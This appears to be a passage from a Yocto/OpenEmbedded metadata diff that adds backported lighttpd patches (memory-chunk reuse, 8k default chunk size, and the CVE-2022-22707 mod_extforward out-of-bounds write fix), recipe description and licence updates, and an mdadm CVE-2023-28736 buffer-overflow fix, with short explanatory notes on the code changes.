-From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001
+From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001
From: Alexander Kanavin <alex.kanavin@gmail.com>
Date: Fri, 26 Aug 2016 18:20:32 +0300
Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
@@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
RP 2014/5/22
Upstream-Status: Pending
Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
---
configure.ac | 16 ++++++++++++----
1 file changed, 12 insertions(+), 4 deletions(-)
diff --git a/configure.ac b/configure.ac
-index 5383cec..c29a902 100644
+index dbddfb9..62cf17f 100644
--- a/configure.ac
+++ b/configure.ac
-@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre],
+@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre],
)
AC_MSG_RESULT([$WITH_PCRE])
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644
else
AC_PATH_PROG([PCRECONFIG], [pcre-config])
if test -n "$PCRECONFIG"; then
---
-2.15.0
-
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
new file mode 100644
index 0000000000..e226366112
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
@@ -0,0 +1,224 @@
+From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Wed, 23 Dec 2020 23:14:47 -0500
+Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033)
+
+(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337)
+
+(thx flynn)
+
+fix large memory usage for large file downloads from dynamic backends
+
+reuse or release large memory chunks
+
+x-ref:
+ "Memory Growth with PUT and full buffered streams"
+ https://redmine.lighttpd.net/issues/3033
+
+Upstream-Status: Backport
+Comment: Hunk refreshed to make it backward compatible.
+https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+
+---
+ src/chunk.c | 99 +++++++++++++++++++++++++++++++++---------
+ src/chunk.h | 2 +
+ src/http-header-glue.c | 2 +-
+ 3 files changed, 82 insertions(+), 21 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 133308f..d7259b9 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -28,16 +28,20 @@
+ static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
++static int chunks_oversized_n;
+ static array *chunkqueue_default_tempdirs = NULL;
+ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
++ size_t x = 1024;
++ while (x < sz && x < (1u << 30)) x <<= 1;
++ chunk_buf_sz = sz > 0 ? x : 8192;
+ }
+
+ void chunkqueue_set_tempdirs_default_reset (void)
+ {
++ chunk_buf_sz = 8192;
+ chunkqueue_default_tempdirs = NULL;
+ chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ }
+@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) {
+ free(c);
+ }
+
+-buffer * chunk_buffer_acquire(void) {
++static chunk * chunk_pop_oversized(size_t sz) {
++ /* future: might have buckets of certain sizes, up to socket buf sizes */
++ if (chunks_oversized && chunks_oversized->mem->size >= sz) {
++ --chunks_oversized_n;
++ chunk *c = chunks_oversized;
++ chunks_oversized = c->next;
++ return c;
++ }
++ return NULL;
++}
++
++static void chunk_push_oversized(chunk * const c, const size_t sz) {
++ if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) {
++ ++chunks_oversized_n;
++ chunk **co = &chunks_oversized;
++ while (*co && sz < (*co)->mem->size) co = &(*co)->next;
++ c->next = *co;
++ *co = c;
++ }
++ else
++ chunk_free(c);
++}
++
++static buffer * chunk_buffer_acquire_sz(size_t sz) {
+ chunk *c;
+ buffer *b;
+- if (chunks) {
+- c = chunks;
+- chunks = c->next;
++ if (sz <= chunk_buf_sz) {
++ if (chunks) {
++ c = chunks;
++ chunks = c->next;
++ }
++ else
++ c = chunk_init(chunk_buf_sz);
++ /* future: might choose to pop from chunks_oversized, if available
++ * (even if larger than sz) rather than allocating new chunk
++ * (and if doing so, might replace chunks_oversized_n) */
+ }
+ else {
+- c = chunk_init(chunk_buf_sz);
++ /*(round up to nearest chunk_buf_sz)*/
++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++ c = chunk_pop_oversized(sz);
++ if (NULL == c)
++ c = chunk_init(sz);
+ }
+ c->next = chunk_buffers;
+ chunk_buffers = c;
+@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) {
+ return b;
+ }
+
++buffer * chunk_buffer_acquire(void) {
++ return chunk_buffer_acquire_sz(chunk_buf_sz);
++}
++
+ void chunk_buffer_release(buffer *b) {
+ if (NULL == b) return;
+- if (b->size >= chunk_buf_sz && chunk_buffers) {
++ if (chunk_buffers) {
+ chunk *c = chunk_buffers;
+ chunk_buffers = c->next;
+ c->mem = b;
+- c->next = chunks;
+- chunks = c;
+ buffer_clear(b);
++ if (b->size == chunk_buf_sz) {
++ c->next = chunks;
++ chunks = c;
++ }
++ else if (b->size > chunk_buf_sz)
++ chunk_push_oversized(c, b->size);
++ else
++ chunk_free(c);
+ }
+ else {
+ buffer_free(b);
+ }
+ }
+
++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) {
++ if (sz > chunk_buffer_string_space(b)) {
++ sz += b->used ? b->used : 1;
++ buffer * const cb = chunk_buffer_acquire_sz(sz);
++ /* swap buffer contents and copy original b->ptr into larger b->ptr */
++ /*(this does more than buffer_move())*/
++ buffer tb = *b;
++ *b = *cb;
++ *cb = tb;
++ if ((b->used = tb.used))
++ memcpy(b->ptr, tb.ptr, tb.used);
++ chunk_buffer_release(cb);
++ }
++ return chunk_buffer_string_space(b);
++}
++
+ static chunk * chunk_acquire(size_t sz) {
+ if (sz <= chunk_buf_sz) {
+ if (chunks) {
+@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) {
+ sz = chunk_buf_sz;
+ }
+ else {
+- sz = (sz + 8191) & ~8191uL;
+- /* future: might have buckets of certain sizes, up to socket buf sizes*/
+- if (chunks_oversized && chunks_oversized->mem->size >= sz) {
+- chunk *c = chunks_oversized;
+- chunks_oversized = c->next;
+- return c;
+- }
++ /*(round up to nearest chunk_buf_sz)*/
++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++ chunk *c = chunk_pop_oversized(sz);
++ if (c) return c;
+ }
+
+ return chunk_init(sz);
+@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) {
+ }
+ else if (sz > chunk_buf_sz) {
+ chunk_reset(c);
+- chunk **co = &chunks_oversized;
+- while (*co && sz < (*co)->mem->size) co = &(*co)->next;
+- c->next = *co;
+- *co = c;
++ chunk_push_oversized(c, sz);
+ }
+ else {
+ chunk_free(c);
+@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void)
+ chunk_free(c);
+ }
+ chunks_oversized = NULL;
++ chunks_oversized_n = 0;
+ }
+
+ void chunkqueue_chunk_pool_free(void)
+diff --git a/src/chunk.h b/src/chunk.h
+index 4c6b7e4..93f343c 100644
+--- a/src/chunk.h
++++ b/src/chunk.h
+@@ -50,6 +50,8 @@ typedef struct {
+ buffer * chunk_buffer_acquire(void);
+ void chunk_buffer_release(buffer *b);
+
++size_t chunk_buffer_prepare_append (buffer *b, size_t sz);
++
+ void chunkqueue_chunk_pool_clear(void);
+ void chunkqueue_chunk_pool_free(void);
+
+diff --git a/src/http-header-glue.c b/src/http-header-glue.c
+index d54f00c..2231fba 100644
+--- a/src/http-header-glue.c
++++ b/src/http-header-glue.c
+@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o
+ if (avail < toread) {
+ /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/
+ avail = avail ? avail - 1 + toread : toread;
+- buffer_string_prepare_append(b, avail);
++ avail = chunk_buffer_prepare_append(b, avail);
+ }
+
+ n = read(fd, b->ptr+buffer_string_length(b), avail);
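Editorial note: the chunk-pool rework above rests on two size rules: chunkqueue_set_chunk_size() now grows the base chunk size only in powers of two, and oversized requests are rounded up to a multiple of that base size before being allocated or matched against the oversized pool. A standalone sketch of both calculations (not lighttpd code; the names are illustrative):

    /* Standalone sketch (not lighttpd code) of the two size rules in the
     * patch above: round the configured chunk size up to a power of two,
     * and round oversized requests up to a multiple of the base size. */
    #include <stdio.h>
    #include <stddef.h>

    static size_t round_up_pow2(size_t sz)
    {
        size_t x = 1024;                        /* minimum chunk size */
        while (x < sz && x < ((size_t)1 << 30))
            x <<= 1;
        return sz > 0 ? x : 8192;               /* 0 means "use the default" */
    }

    static size_t round_up_multiple(size_t sz, size_t chunk_buf_sz)
    {
        /* same idiom as (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
         * valid because chunk_buf_sz is a power of two */
        return (sz + (chunk_buf_sz - 1)) & ~(chunk_buf_sz - 1);
    }

    int main(void)
    {
        printf("%zu\n", round_up_pow2(5000));            /* prints 8192  */
        printf("%zu\n", round_up_multiple(20000, 8192)); /* prints 24576 */
        return 0;
    }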
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
new file mode 100644
index 0000000000..da59b7297a
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
@@ -0,0 +1,100 @@
+From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001
+From: povcfe <povcfe@qq.com>
+Date: Wed, 5 Jan 2022 11:11:09 +0000
+Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134)
+
+(thx povcfe)
+
+(edited: gstrauss)
+
+There is a potential remote denial of service in lighttpd mod_extforward
+under specific, non-default and uncommon 32-bit lighttpd mod_extforward
+configurations.
+
+Under specific, non-default and uncommon lighttpd mod_extforward
+configurations, a remote attacker can trigger a 4-byte out-of-bounds
+write of value '-1' to the stack. This is not believed to be exploitable
+in any way beyond triggering a crash of the lighttpd server on systems
+where the lighttpd server has been built 32-bit and with compiler flags
+which enable a stack canary -- gcc/clang -fstack-protector-strong or
+-fstack-protector-all, but bug not visible with only -fstack-protector.
+
+With standard lighttpd builds using -O2 optimization on 64-bit x86_64,
+this bug has not been observed to cause adverse behavior, even with
+gcc/clang -fstack-protector-strong.
+
+For the bug to be reachable, the user must be using a non-default
+lighttpd configuration which enables mod_extforward and configures
+mod_extforward to accept and parse the "Forwarded" header from a trusted
+proxy. At this time, support for RFC7239 Forwarded is not common in CDN
+providers or popular web server reverse proxies. It bears repeating that
+for the user to desire to configure lighttpd mod_extforward to accept
+"Forwarded", the user must also be using a trusted proxy (in front of
+lighttpd) which understands and actively modifies the "Forwarded" header
+sent to lighttpd.
+
+lighttpd natively supports RFC7239 "Forwarded"
+hiawatha natively supports RFC7239 "Forwarded"
+
+nginx can be manually configured to add a "Forwarded" header
+https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/
+
+A 64-bit build of lighttpd on x86_64 (not known to be affected by bug)
+in front of another 32-bit lighttpd will detect and reject a malicious
+"Forwarded" request header, thereby thwarting an attempt to trigger
+this bug in an upstream 32-bit lighttpd.
+
+The following servers currently do not natively support RFC7239 Forwarded:
+nginx
+apache2
+caddy
+node.js
+haproxy
+squid
+varnish-cache
+litespeed
+
+Given the general dearth of support for RFC7239 Forwarded in popular
+CDNs and web server reverse proxies, and given the prerequisites in
+lighttpd mod_extforward needed to reach this bug, the number of lighttpd
+servers vulnerable to this bug is estimated to be vanishingly small.
+Large systems using reverse proxies are likely running 64-bit lighttpd,
+which is not known to be adversely affected by this bug.
+
+In the future, it is desirable for more servers to implement RFC7239
+Forwarded. lighttpd developers would like to thank povcfe for reporting
+this bug so that it can be fixed before more CDNs and web servers
+implement RFC7239 Forwarded.
+
+x-ref:
+ "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1"
+ https://redmine.lighttpd.net/issues/3134
+ (not yet written or published)
+ CVE-2022-22707
+
+Upstream-Status: Backport
+CVE: CVE-2022-22707
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ src/mod_extforward.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mod_extforward.c b/src/mod_extforward.c
+index ba957e04..fdaef7f6 100644
+--- a/src/mod_extforward.c
++++ b/src/mod_extforward.c
+@@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c
+ while (s[i] == ' ' || s[i] == '\t') ++i;
+ if (s[i] == ';') { ++i; continue; }
+ if (s[i] == ',') {
+- if (j >= (int)(sizeof(offsets)/sizeof(int))) break;
++ if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break;
+ offsets[++j] = -1; /*("offset" separating params from next proxy)*/
+ ++i;
+ continue;
+--
+2.25.1
+
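Editorial note: the one-line fix above tightens the bounds check from j >= N to j >= N-1 because the store uses a pre-increment, offsets[++j], which writes at index j+1. A minimal standalone illustration (not lighttpd code):

    /* Standalone sketch (not lighttpd code): why the bound must be N-1 when
     * the store uses a pre-increment. offsets[++j] writes at index j+1, so
     * the loop must stop while j+1 is still a valid index. */
    #include <stdio.h>

    #define N 8   /* stand-in for sizeof(offsets)/sizeof(int) */

    int main(void)
    {
        int offsets[N];
        int j = -1;

        for (int tokens = 0; tokens < 100; tokens++) {
            if (j >= N - 1)        /* with the old check (j >= N) the next   */
                break;             /* line could write offsets[N], past the end */
            offsets[++j] = tokens; /* writes at index j+1 */
        }
        printf("stored %d offsets, last index %d\n", j + 1, j);
        return 0;
    }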
diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
new file mode 100644
index 0000000000..fd75ca6e26
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
@@ -0,0 +1,35 @@
+From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Fri, 29 Nov 2019 18:18:52 -0500
+Subject: [PATCH] default chunk size 8k (was 4k)
+
+Upstream-Status: Backport
+Comment: No hunk refreshed
+https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/chunk.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 09dd3f1..133308f 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -25,7 +25,7 @@
+ #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024)
+ #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024)
+
+-static size_t chunk_buf_sz = 4096;
++static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
+ static array *chunkqueue_default_tempdirs = NULL;
+@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096;
++ chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
+ }
+
+ void chunkqueue_set_tempdirs_default_reset (void)
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
index 7a255ce2f2..357a269015 100644
--- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
+++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
@@ -1,5 +1,6 @@
SUMMARY = "Lightweight high-performance web server"
HOMEPAGE = "http://www.lighttpd.net/"
+DESCRIPTION = "Lightweight high-performance web server is designed and optimized for high performance environments. With a small memory footprint compared to other web-servers, effective management of the cpu-load, and advanced feature set (FastCGI, SCGI, Auth, Output-Compression, URL-Rewriting and many more)"
BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues"
LICENSE = "BSD-3-Clause"
@@ -13,10 +14,13 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \
lighttpd-module-accesslog"
SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \
+ file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \
file://index.html.lighttpd \
file://lighttpd.conf \
file://lighttpd \
file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \
+ file://default-chunk-size-8k.patch \
+ file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \
"
SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03"
diff --git a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
index 17f4bf4617..7c1b77add8 100644
--- a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
+++ b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
@@ -1,6 +1,7 @@
SUMMARY = "Rotates, compresses, removes and mails system log files"
SECTION = "console/utils"
-HOMEPAGE = "https://github.com/logrotate/logrotate/issues"
+HOMEPAGE = "https://github.com/logrotate/logrotate/"
+DESCRIPTION = "The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files."
LICENSE = "GPLv2"
# TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox?
@@ -21,6 +22,9 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.xz
SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb"
SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b"
+# These CVEs are Debian, Gentoo or SUSE specific and relate to the way logrotate was installed/used
+CVE_CHECK_WHITELIST += "CVE-2011-1548 CVE-2011-1549 CVE-2011-1550"
+
PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}"
PACKAGECONFIG[acl] = ",,acl"
diff --git a/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
new file mode 100644
index 0000000000..f32cd18370
--- /dev/null
+++ b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
@@ -0,0 +1,27 @@
+lsb-release maintains its own copy of help2man. Include the support
+for specifying SOURCE_DATE_EPOCH from upstream.
+
+Upstream-Status: Pending
+
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+
+diff --git a/help2man b/help2man
+index 13015c2..63439db 100755
+--- a/help2man
++++ b/help2man
+@@ -173,7 +173,14 @@ my ($help_text, $version_text) = map {
+ or die "$this_program: can't get `--$_' info from $ARGV[0]\n"
+ } qw(help), $opt_version_key;
+
+-my $date = strftime "%B %Y", localtime;
++my $epoch_secs = time;
++if (exists $ENV{SOURCE_DATE_EPOCH} and $ENV{SOURCE_DATE_EPOCH} =~ /^(\d+)$/)
++{
++ $epoch_secs = $1;
++ $ENV{TZ} = 'UTC0';
++}
++
++my $date = strftime "%B %Y", localtime $epoch_secs;
+ (my $program = $ARGV[0]) =~ s!.*/!!;
+ my $package = $program;
+ my $version;
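Editorial note: the help2man change implements the usual SOURCE_DATE_EPOCH convention; if the variable holds a decimal epoch value, dates are formatted from it in UTC rather than from the current local time. A standalone C sketch of the same convention (an illustration only, not part of help2man, which is Perl):

    /* Standalone sketch (not help2man code) of the SOURCE_DATE_EPOCH
     * convention: if set to a decimal epoch value, format dates from it in
     * UTC instead of from the current local time. */
    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>

    int main(void)
    {
        time_t when = time(NULL);
        const char *sde = getenv("SOURCE_DATE_EPOCH");
        char *end;

        if (sde && *sde) {
            unsigned long long v = strtoull(sde, &end, 10);
            if (*end == '\0')
                when = (time_t)v;      /* accept only a pure decimal value */
        }

        char buf[64];
        struct tm tm;
        gmtime_r(&when, &tm);          /* UTC, like setting TZ=UTC0 */
        strftime(buf, sizeof(buf), "%B %Y", &tm);
        printf("%s\n", buf);
        return 0;
    }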
diff --git a/meta/recipes-extended/lsb/lsb-release_1.4.bb b/meta/recipes-extended/lsb/lsb-release_1.4.bb
index 3e8f7a13ec..bafc18fcc0 100644
--- a/meta/recipes-extended/lsb/lsb-release_1.4.bb
+++ b/meta/recipes-extended/lsb/lsb-release_1.4.bb
@@ -11,6 +11,7 @@ LIC_FILES_CHKSUM = "file://README;md5=12da544b1a3a5a1795a21160b49471cf"
SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \
file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \
file://0001-Remove-timestamp-from-manpage.patch \
+ file://help2man-reproducibility.patch \
"
SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4"
diff --git a/meta/recipes-extended/lsof/lsof_4.91.bb b/meta/recipes-extended/lsof/lsof_4.91.bb
index b3adfd57af..7c85bf23fc 100644
--- a/meta/recipes-extended/lsof/lsof_4.91.bb
+++ b/meta/recipes-extended/lsof/lsof_4.91.bb
@@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \
Its name stands for LiSt Open Files, and it does just that."
HOMEPAGE = "http://people.freebsd.org/~abe/"
SECTION = "devel"
-LICENSE = "BSD"
+LICENSE = "Spencer-94"
LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a"
# Upstream lsof releases are hosted on an ftp server which times out download
diff --git a/meta/recipes-extended/ltp/ltp_20200120.bb b/meta/recipes-extended/ltp/ltp_20200120.bb
index 6633755a20..505b7b14fc 100644
--- a/meta/recipes-extended/ltp/ltp_20200120.bb
+++ b/meta/recipes-extended/ltp/ltp_20200120.bb
@@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__"
CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__"
SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5"
-SRC_URI = "git://github.com/linux-test-project/ltp.git \
+SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \
file://0001-build-Add-option-to-select-libc-implementation.patch \
file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \
file://0004-guard-mallocopt-with-__GLIBC__.patch \
diff --git a/meta/recipes-extended/lzip/lzip_1.21.bb b/meta/recipes-extended/lzip/lzip_1.21.bb
index bb3d2a6fe3..bd1c007de6 100644
--- a/meta/recipes-extended/lzip/lzip_1.21.bb
+++ b/meta/recipes-extended/lzip/lzip_1.21.bb
@@ -1,5 +1,6 @@
SUMMARY = "Lossless data compressor based on the LZMA algorithm"
HOMEPAGE = "http://lzip.nongnu.org/lzip.html"
+DESCRIPTION = "Lzip is a lossless data compressor with a user interface similar to the one of gzip or bzip2. Lzip uses a simplified form of the Lempel-Ziv-Markov chain-Algorithm (LZMA) stream format, chosen to maximize safety and interoperability."
SECTION = "console/utils"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \
diff --git a/meta/recipes-extended/man-db/man-db_2.9.0.bb b/meta/recipes-extended/man-db/man-db_2.9.0.bb
index 5b017e8023..7a30f9d722 100644
--- a/meta/recipes-extended/man-db/man-db_2.9.0.bb
+++ b/meta/recipes-extended/man-db/man-db_2.9.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command"
HOMEPAGE = "http://man-db.nongnu.org/"
+DESCRIPTION = "man-db is an implementation of the standard Unix documentation system accessed using the man command. It uses a Berkeley DB database in place of the traditional flat-text whatis databases."
LICENSE = "LGPLv2.1 & GPLv2"
LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \
file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a"
@@ -12,6 +13,7 @@ SRC_URI[sha256sum] = "5d4aacd9e8876d6a3203a889860c3524c293c38f04111a3350deab8a6c
DEPENDS = "libpipeline gdbm groff-native base-passwd"
RDEPENDS_${PN} += "base-passwd"
+PACKAGE_WRITE_DEPS += "base-passwd"
# | /usr/src/debug/man-db/2.8.0-r0/man-db-2.8.0/src/whatis.c:939: undefined reference to `_nl_msg_cat_cntr'
USE_NLS_libc-musl = "no"
@@ -21,6 +23,11 @@ inherit gettext pkgconfig autotools systemd
EXTRA_OECONF = "--with-pager=less --with-systemdsystemunitdir=${systemd_unitdir}/system"
EXTRA_AUTORECONF += "-I ${S}/gl/m4"
+# Can be dropped when the output next changes; avoids failures caused by
+# earlier reproducibility issues
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
do_install() {
autotools_do_install
diff --git a/meta/recipes-extended/mc/mc_4.8.23.bb b/meta/recipes-extended/mc/mc_4.8.23.bb
index ead348b92e..8e3b7a65e0 100644
--- a/meta/recipes-extended/mc/mc_4.8.23.bb
+++ b/meta/recipes-extended/mc/mc_4.8.23.bb
@@ -1,5 +1,6 @@
SUMMARY = "Midnight Commander is an ncurses based file manager"
HOMEPAGE = "http://www.midnight-commander.org/"
+DESCRIPTION = "GNU Midnight Commander is a visual file manager, licensed under GNU General Public License and therefore qualifies as Free Software. It's a feature rich full-screen text mode application that allows you to copy, move and delete files and whole directory trees, search for files and run commands in the subshell. Internal viewer and editor are included."
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2"
SECTION = "console/utils"
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
new file mode 100644
index 0000000000..8e0a06cbc7
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
@@ -0,0 +1,77 @@
+From ced5fa8b170ad448f4076e24a10c731b5cfb36ce Mon Sep 17 00:00:00 2001
+From: Blazej Kucman <blazej.kucman@intel.com>
+Date: Fri, 3 Dec 2021 15:31:15 +0100
+Subject: mdadm: block creation with long names
+
+This fixes buffer overflows in create_mddev(). It prohibits
+creation with unsupported names for DDF and native. For IMSM,
+mdadm will silently truncate the name to 16 characters later.
+
+Signed-off-by: Mariusz Tkaczyk <mariusz.tkaczyk@linux.intel.com>
+Signed-off-by: Blazej Kucman <blazej.kucman@intel.com>
+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=ced5fa8b170ad448f4076e24a10c731b5cfb36ce]
+CVE: CVE-2023-28736
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ mdadm.8.in | 5 +++++
+ mdadm.c | 9 ++++++++-
+ mdadm.h | 5 +++++
+ 3 files changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/mdadm.8.in b/mdadm.8.in
+index 28d773c2..68e100cb 100644
+--- a/mdadm.8.in
++++ b/mdadm.8.in
+@@ -2186,6 +2186,11 @@ is run, but will be created by
+ .I udev
+ once the array becomes active.
+
++The md-device name is limited to a maximum of 32 characters.
++Different metadata types impose stricter limitations
++(like IMSM, where only 16 characters are allowed).
++For that reason, a long name could be truncated or rejected, depending on the metadata policy.
++
+ As devices are added, they are checked to see if they contain RAID
+ superblocks or filesystems. They are also checked to see if the variance in
+ device size exceeds 1%.
+diff --git a/mdadm.c b/mdadm.c
+index 91e67467..26299b2e 100644
+--- a/mdadm.c
++++ b/mdadm.c
+@@ -1359,9 +1359,16 @@ int main(int argc, char *argv[])
+ mdfd = open_mddev(devlist->devname, 1);
+ if (mdfd < 0)
+ exit(1);
+- } else
++ } else {
++ char *bname = basename(devlist->devname);
++
++ if (strlen(bname) > MD_NAME_MAX) {
++ pr_err("Name %s is too long.\n", devlist->devname);
++ exit(1);
++ }
+ /* non-existent device is OK */
+ mdfd = open_mddev(devlist->devname, 0);
++ }
+ if (mdfd == -2) {
+ pr_err("device %s exists but is not an md array.\n", devlist->devname);
+ exit(1);
+diff --git a/mdadm.h b/mdadm.h
+index 54567396..c7268a71 100644
+--- a/mdadm.h
++++ b/mdadm.h
+@@ -1880,3 +1880,8 @@ enum r0layout {
+ #define INVALID_SECTORS 1
+ /* And another special number needed for --data_offset=variable */
+ #define VARIABLE_OFFSET 3
++
++/**
++ * This is true for native and DDF, IMSM allows 16.
++ */
